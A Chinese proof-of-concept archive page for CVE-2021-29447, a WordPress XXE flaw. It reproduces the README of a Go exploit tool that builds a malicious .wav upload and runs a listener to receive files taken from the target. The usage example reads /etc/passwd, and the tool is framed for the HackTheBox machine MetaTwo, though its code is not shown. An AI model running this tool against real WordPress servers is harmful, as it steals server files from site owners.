关联漏洞
标题:
WordPress 代码问题漏洞
(CVE-2021-29447)
描述:WordPress是WordPress(Wordpress)基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 存在代码问题漏洞,攻击者可利用该漏洞在成功的XXE攻击中可以访问内部文件。
介绍
# exploit_cve-2021-29447
For educational purposes only.
This exploit is supposed to be really convenient tool to get any file from server running wordpress 5.6.2 and php8. (see https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)
All you need is base wp-admin access and ability to upload a media file.
The exploit will generate a .wav file payload to upload using wp-admin.
Then it uses exploit's back server to give you eager file right on your console.
The perfect usage is HackTheBox's machine - metatwo https://www.hackthebox.com/machines/metatwo
## Usage/Examples
```
$ go build
$ chmod +x exploit_cve-2021-29447
$ ./exploit_cve-2021-29447 --help
Usage of ./exploit_cve-2021-29447:
-local-server-ip string
Use local server ip where a local server will be set
-local-server-port int
Use local server port to run local server on
-o string
Output file to save exploit's result
-target-path string
Use target path to point on file you want to get from target server
$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd
```
文件快照
[4.0K] /data/pocs/6f1d96de5581df75ee446f264276ae0f9759e7cb
├── [ 59] go.mod
├── [6.2K] main.go
├── [ 258] Makefile
├── [ 14M] preview.gif
└── [1.2K] README.md
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。